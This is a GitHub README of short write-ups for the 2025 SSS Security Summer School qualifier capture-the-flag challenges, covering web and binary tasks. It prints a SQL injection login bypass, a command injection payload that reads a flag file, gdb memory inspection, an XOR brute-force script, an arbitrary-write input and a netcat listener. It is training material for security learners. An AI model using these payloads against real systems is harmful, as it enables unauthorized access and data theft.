https://github.com/ahossu/sss_qualifiers_v12
The write-ups for the preselection exam of the SSS Security Summer School at UNSTB, Romania, 2025 Edition.
- Host: GitHub
- URL: https://github.com/ahossu/sss_qualifiers_v12
- Owner: ahossu
- Created: 2025-04-19T21:46:23.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-04-19T22:20:00.000Z (about 1 year ago)
- Last Synced: 2025-07-01T09:05:30.865Z (11 months ago)
- Topics: binary-exploitation, ctf, ctf-challenges, ctf-platform, ctf-writeups, cyber-security, cybersecurity, pwn, pwntools, reverse-engineering, web, web-security
- Language: C
- Homepage: https://security.cs.pub.ro/summer-school/wiki/
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# SSS_Qualifiers_v12
##### 2025 Edition
- **Web: Qualifiers: Sequel Pro**
`we use SQL Injection for this as the title suggests`
`user: admin`
`pass: ' OR '1' = '1`
`the secret appears`
- **Web: Qualifiers: Cake**
`we change the value of the FLAG cookie in applepie`
`we refresh and we see the cookie updated`
`it contains the flag`
- **Web: Qualifiers: Welcome**
`we look at the source code`
`first part in:`
`/static/css/main.css`
`second part in:`
`svyr_`
`third part in:`
`/static/hidden.js?v=`
`fourth part in:`
`/static/logo.png`
- **Web: Qualifiers: In Your Face**
`we look at the source code`
``
`we apply base64 on this string`
- **Web: Qualifiers: IP Destroyer**
`simple command injection to cat the flag.txt`
`after searching in multiple directories we find the flag inside /home/ctf/flag`
`so the input to retrieve the flag is: -c 0 8.8.8.8; cat /home/ctf/flag`
- **Binary: Qualifiers: Black Hole**
`opened it in IDA`
`we see that the flag is written to /dev/null, so it is impossible to retrieve it from there`
`we use gdb to see the flag before it is written to that file`
`gdb ./black_hole`
`gef➤ break fwrite`
`gef➤ run`
`gef➤ x/s $rdi`
`0x602480: "SSS{the_[REDACTED]_see}"`
- **Binary: Qualifiers: One by One**
`opened it in Ghidra and then we extract`
`part20 64h; part0 53h; part24 6Fh; part18 6Fh; part3 7Bh; part27 7Dh; part11 6Fh; part13 5Fh; part23 6Ch; part12 66h; part14 74h; part21 5Fh; part9 70h; part26 6Bh; part17 5Fh; part25 63h; part15 68h; part6 63h; part7 68h; part22 62h; part2 53h; part8 69h; part5 5Fh; part19 6Ch; part4 61h; part16 65h; part1 53h; part10 5Fh`
`we order them and then we convert them from base64`
- **Binary: Qualifiers: Not Backdoor**
`the file not_backdoor.exe is a POSIX tar archive (GNU)`
`we extract not_backdoor, then we analyse the code in IDA`
`we use the following script to try all XOR possibilities in the function sub_4006B6`
`orig = [60, 60, 60, 20, 31, 29, 92, 27, 27, 22, 48, 12, 95, 1, 25, 0, 3, 26, 27, 10, 11, 48, 9, 3, 91, 8, 18, 111]`
`for key in range(256):`
`    decoded = ''.join(chr(b ^ key) for b in orig)`
`    print(key, decoded)`
`there was one result that matched the format starting with SSS and was the flag`
- **Binary: Qualifiers: Mirror Me**
`opened it in IDA`
`in max_mirror() function the output is 906609`
`we choose 2 numbers with the product 906609: 913 and 993, so we can get to system("/bin/sh");`
`then we search for the flag in the system and we find it in ./home/ctf/flag`
- **Binary: Qualifiers: Pinpoint**
`opened it in IDA`
`.data:0000000000601058 v dd 53535353h`
`this is the value we need to modify`
`1398297427 = 0x53585353`
`initially v is 0x53535353`
`the four bytes are: at address 0x601058 is 0x53, at address 0x601059 is 0x53, at address 0x60105A is 0x53, at address 0x60105B is 0x53`
`the only difference between the initial value (0x53535353) and the target (0x53585353) is in the third byte (offset 2)`
`we only need to change that byte`
`offset 2 so we have to modify at 0x601058 + 2 = 0x60105A`
`we must change it from 0x53 (83 decimal) to 0x58 (88 decimal)`
`0x60105A = 6295642`
`so the inputs are 6295642 and 88`
`then we search for the flag in the system and we find it in ./home/ctf/flag`
- **Binary: Qualifiers: The Talker**
`*(_DWORD *)&s.sa_data[2] = htonl(0x7F000001u); -> sends to localhost`
`*(_WORD *)s.sa_data = htons(4444u); -> sends at port 4444`
`sleep(10u); -> every 10 seconds`
`read_flag(buf, 128LL) reads ../flag into a buffer`
`the binary sends to 127.0.0.1:4444 every 10 seconds using sendto()`
`we log in to connect@141.85.224.99 and we use nc -ul 4444 to listen on port 4444 and we receive the flag`